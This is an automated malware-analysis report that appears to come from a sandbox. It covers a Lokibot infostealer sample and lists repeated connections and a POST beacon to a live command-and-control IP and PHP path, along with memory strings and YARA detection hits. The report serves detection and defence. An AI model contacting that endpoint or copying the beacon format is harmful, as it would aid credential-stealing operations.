Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194
Source: unknown	TCP traffic detected without corresponding DNS query: 31.220.1.194

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe

Code function: 1_2_00404ED4 recv,

1_2_00404ED4

Source: unknown

HTTP traffic detected: POST /~zadmin/ptr5/mono.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 31.220.1.194Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0B63912Content-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Mar 2024 19:56:52 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.yaworld.net/wp-json/>; rel="https://api.w.org/"Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 6f 2d 4b 52 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 21 2d 2d 20 4d 65 74 61 20 73 6f 63 69 61 6c 20 6e 65 74 77 6f 72 6b 73 20 2d 2d 3e 0a 09 09 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 09 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 35 46 31 48 42 4b 51 30 58 45 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 35 46 31 48 42 4b 51 30 58 45 27 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 4d 65 74 61 20 56 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 72 37 51 47 36 6b 34 57 42 48 67 33 5f 46 64 45 72 64 42 53 71 76 42 79 7a 5f 4c 57 44 37 6c 54 39 47 76 48 74 66 79 39 49 77 22 20 2f 3e 09 0a 3c 73 74 79 6c 65 3e 0a 09 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 73 63 72 65 65 6e 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 38 29 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 68 32 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Mar 2024 19:56:53 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.yaworld.net/wp-json/>; rel="https://api.w.org/"Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 6f 2d 4b 52 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 21 2d 2d 20 4d 65 74 61 20 73 6f 63 69 61 6c 20 6e 65 74 77 6f 72 6b 73 20 2d 2d 3e 0a 09 09 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 09 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 35 46 31 48 42 4b 51 30 58 45 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 35 46 31 48 42 4b 51 30 58 45 27 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 4d 65 74 61 20 56 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 72 37 51 47 36 6b 34 57 42 48 67 33 5f 46 64 45 72 64 42 53 71 76 42 79 7a 5f 4c 57 44 37 6c 54 39 47 76 48 74 66 79 39 49 77 22 20 2f 3e 09 0a 3c 73 74 79 6c 65 3e 0a 09 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 73 63 72 65 65 6e 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 38 29 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 68 32 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Mar 2024 19:56:55 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.yaworld.net/wp-json/>; rel="https://api.w.org/"Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 6f 2d 4b 52 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 21 2d 2d 20 4d 65 74 61 20 73 6f 63 69 61 6c 20 6e 65 74 77 6f 72 6b 73 20 2d 2d 3e 0a 09 09 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 09 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 35 46 31 48 42 4b 51 30 58 45 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 35 46 31 48 42 4b 51 30 58 45 27 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 4d 65 74 61 20 56 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 72 37 51 47 36 6b 34 57 42 48 67 33 5f 46 64 45 72 64 42 53 71 76 42 79 7a 5f 4c 57 44 37 6c 54 39 47 76 48 74 66 79 39 49 77 22 20 2f 3e 09 0a 3c 73 74 79 6c 65 3e 0a 09 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 73 63 72 65 65 6e 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 38 29 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 68 32 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Mar 2024 19:56:57 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.yaworld.net/wp-json/>; rel="https://api.w.org/"Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 6f 2d 4b 52 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 21 2d 2d 20 4d 65 74 61 20 73 6f 63 69 61 6c 20 6e 65 74 77 6f 72 6b 73 20 2d 2d 3e 0a 09 09 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 09 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 35 46 31 48 42 4b 51 30 58 45 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 35 46 31 48 42 4b 51 30 58 45 27 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 4d 65 74 61 20 56 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 72 37 51 47 36 6b 34 57 42 48 67 33 5f 46 64 45 72 64 42 53 71 76 42 79 7a 5f 4c 57 44 37 6c 54 39 47 76 48 74 66 79 39 49 77 22 20 2f 3e 09 0a 3c 73 74 79 6c 65 3e 0a 09 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 73 63 72 65 65 6e 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 38 29 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d 6f 64 61 6c 5f 63 6f 6e 74 65 6e 74 20 68 32 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0a 09 09 7d 0a 09 09 23 64 63 6c 6d 5f 6d

Source: XZoxEqlRUw.exe, 00000001.00000002.1683683181.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, XZoxEqlRUw.exe, 00000001.00000002.1683820658.00000000006B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.220.1.194/~zadmin/ptr5/mono.php
Source: XZoxEqlRUw.exe, 00000001.00000002.1684081964.00000000025E9000.00000004.00000020.00020000.00000000.sdmp, XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gmpg.org/xfn/11
Source: XZoxEqlRUw.exe, XZoxEqlRUw.exe, 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.w.org/
Source: XZoxEqlRUw.exe, 00000001.00000002.1684081964.00000000025E9000.00000004.00000020.00020000.00000000.sdmp, XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ogp.me/ns#
Source: XZoxEqlRUw.exe, 00000001.00000002.1684081964.00000000025E9000.00000004.00000020.00020000.00000000.sdmp, XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rankmath.com/
Source: XZoxEqlRUw.exe, 00000001.00000002.1684081964.00000000025E9000.00000004.00000020.00020000.00000000.sdmp, XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://schema.org
Source: XZoxEqlRUw.exe, 00000001.00000002.1684081964.00000000025E9000.00000004.00000020.00020000.00000000.sdmp, XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-5F1HBKQ0XE
Source: XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.yaworld.net
Source: XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.yaworld.net/#logo
Source: XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.yaworld.net/#organization
Source: XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.yaworld.net/#website
Source: XZoxEqlRUw.exe, 00000001.00000002.1684081964.00000000025E9000.00000004.00000020.00020000.00000000.sdmp, XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.yaworld.net/comments/feeP
Source: XZoxEqlRUw.exe, 00000001.00000002.1684081964.00000000025E9000.00000004.00000020.00020000.00000000.sdmp, XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.yaworld.net/feed/
Source: XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.yaworld.net/wp-content/uploads/2023/11/android-chrome-512x512-1.png
Source: XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.yaworld.net/wp-json/

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.XZoxEqlRUw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 1.2.XZoxEqlRUw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 1.2.XZoxEqlRUw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 1.2.XZoxEqlRUw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.XZoxEqlRUw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 1.2.XZoxEqlRUw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 1.2.XZoxEqlRUw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 1.2.XZoxEqlRUw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.XZoxEqlRUw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.XZoxEqlRUw.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1616007059.0000000004DD4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1616007059.0000000004DD4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1616007059.0000000004DD4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: XZoxEqlRUw.exe PID: 7604, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: XZoxEqlRUw.exe PID: 7628, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: 0_2_00401188	0_2_00401188
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: 1_2_0040549C	1_2_0040549C
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: 1_2_004029D4	1_2_004029D4

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: String function: 00405B6F appears 42 times

